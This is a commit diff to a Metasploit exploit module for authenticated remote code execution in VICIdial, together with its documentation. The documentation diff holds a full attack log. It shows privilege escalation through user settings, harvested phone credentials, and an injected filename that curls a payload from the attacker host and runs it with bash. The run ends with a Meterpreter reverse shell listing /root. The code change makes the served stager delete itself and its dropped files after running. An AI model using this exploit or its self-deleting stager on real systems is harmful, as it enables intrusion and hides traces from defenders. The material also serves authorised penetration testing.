Better file clean

Chocapikk · Chocapikk · commit 10a4b24ed7b1 · 2024-09-27T01:17:07.000+02:00
diff --git a/documentation/modules/exploit/unix/webapp/vicidial_agent_authenticated_rce.md b/documentation/modules/exploit/unix/webapp/vicidial_agent_authenticated_rce.md
@@ -181,46 +181,61 @@ System should be installed. Please type 'reboot' to cleanly load everything.
 Using `cmd/linux/http/x64/meterpreter_reverse_tcp`:
 
 ```
-msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > run http://192.168.1.4 username=6666 password=password
-[*] Exploit running as background job 7.
+msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > run http://192.168.1.28 username=6666 password=password
+[*] Exploit running as background job 12.
 [*] Exploit completed, but no session was created.
 msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 
-[*] Started reverse TCP handler on 192.168.1.36:1337 
-[*] Using URL: http://192.168.1.36:5000/W5akuCuThi0ZAuR
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] VICIdial version: 2.14-705
+[+] The target is vulnerable.
+[*] Using URL: http://192.168.1.36:5000/piAF2DipO
 [*] Server started.
 [*] Payload is ready at /
 [+] Authenticated successfully as user '6666'
 [+] Updated user settings to increase privileges
 [+] Updated system settings
-[+] Created dummy campaign 'Shanahan Group'
+[+] Created dummy campaign 'Haley-Huel'
 [+] Updated dummy campaign settings
-[+] Created dummy list 'Shanahan Group List' for campaign '134542'
+[+] Created dummy list 'Haley-Huel List' for campaign '898934'
 [+] Found phone credentials: Extension=callin, Password=test, Recording Extension=8309
-[+] Retrieved dynamic field names: MGR_login20240918, MGR_pass20240918
+[+] Retrieved dynamic field names: MGR_login20240926, MGR_pass20240926
 [+] Entered "manager" credentials to override shift enforcement
 [+] Authenticated as agent using phone credentials
-[+] Session Name: 1726664220_8300defaul12350341, Session ID: 8600051
-[*] Generated malicious command: $(curl$IFS-k$IFS@192.168.1.36:5000$IFS-o$IFS.Ip7&&bash$IFS.Ip7)
-[*] MonitorConf command sent for Channel Local/8309@default on 192.168.1.4
-Filename: $(curl$IFS-k$IFS@192.168.1.36:5000$IFS-o$IFS.Ip7&&bash$IFS.Ip7)
-RecorDing_ID: 5
+[+] Session Name: 1727385175_8300defaul11764031, Session ID: 8600051
+[*] Generated malicious command: $(curl$IFS-k$IFS@192.168.1.36:5000$IFS-o$IFS.Vysha&&bash$IFS.Vysha)
+[*] MonitorConf command sent for Channel Local/8309@default on 192.168.1.28
+Filename: $(curl$IFS-k$IFS@192.168.1.36:5000$IFS-o$IFS.Vysha&&bash$IFS.Vysha)
+RecorDing_ID: 10
  RECORDING WILL LAST UP TO 60 MINUTES
 
 [+] Stopped malicious recording to prevent file size from growing
+[*] Deleting dummy campaign with ID: 898934
+[+] Campaign 898934 deleted successfully.
 [*] Waiting for 300 seconds to allow the cron job to execute the payload...
-[*] Received request at: /, Client Address: 192.168.1.4
-[*] Sending response to 192.168.1.4 for /
-[*] Sending stage (3045380 bytes) to 192.168.1.4
-[*] Meterpreter session 45 opened (192.168.1.36:1337 -> 192.168.1.4:7040) at 2024-09-18 16:56:48 +0200
-
-msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > sessions 45
-[*] Starting interaction with 45...
-
-meterpreter > sysinfo 
-Computer     : 192.168.1.4
-OS           :  (Linux 5.14.21-150500.55.12-default)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
+[*] Received request at: / - Client Address: 192.168.1.28
+[*] Sending response to 192.168.1.28 for /
+[*] Sending stage (3045380 bytes) to 192.168.1.28
+[*] Meterpreter session 18 opened (192.168.1.36:4444 -> 192.168.1.28:26572) at 2024-09-27 01:14:12 +0200
+
+msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > sessions 18
+[*] Starting interaction with 18...
+
+meterpreter > pwd
+/var/spool/asterisk/monitor
+meterpreter > ls
+No entries exist in /var/spool/asterisk/monitor
+meterpreter > ls /root/
+Listing: /root/
+===============
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100600/rw-------  254   fil   2024-09-26 22:31:38 +0200  .bash_history
+040700/rwx------  4096  dir   2022-03-15 12:35:24 +0100  .gnupg
+040755/rwxr-xr-x  4096  dir   2023-08-06 12:37:28 +0200  .subversion
+100644/rw-r--r--  35    fil   2023-08-06 12:37:27 +0200  .zypper.conf
+040755/rwxr-xr-x  4096  dir   2022-03-15 12:35:24 +0100  bin
+
 meterpreter > 
 ```
diff --git a/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb b/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb
@@ -139,9 +139,10 @@ def primer
   def on_request_uri_payload(cli, request)
     bash_command = <<-BASH
   #!/bin/bash
+  rm -- $(readlink /proc/$$/fd/255)
   cd /var/spool/asterisk/monitor/
-  find . -maxdepth 1 -type f -delete
   #{payload.encoded}
+  find . -maxdepth 1 -type f -delete
     BASH
 
     handle_request(cli, request, bash_command)
@@ -570,4 +571,4 @@ def wait_for_cron_job
     print_status("Waiting for #{datastore['WfsDelay']} seconds to allow the cron job to execute the payload...")
     service.wait
   end
-end
+end
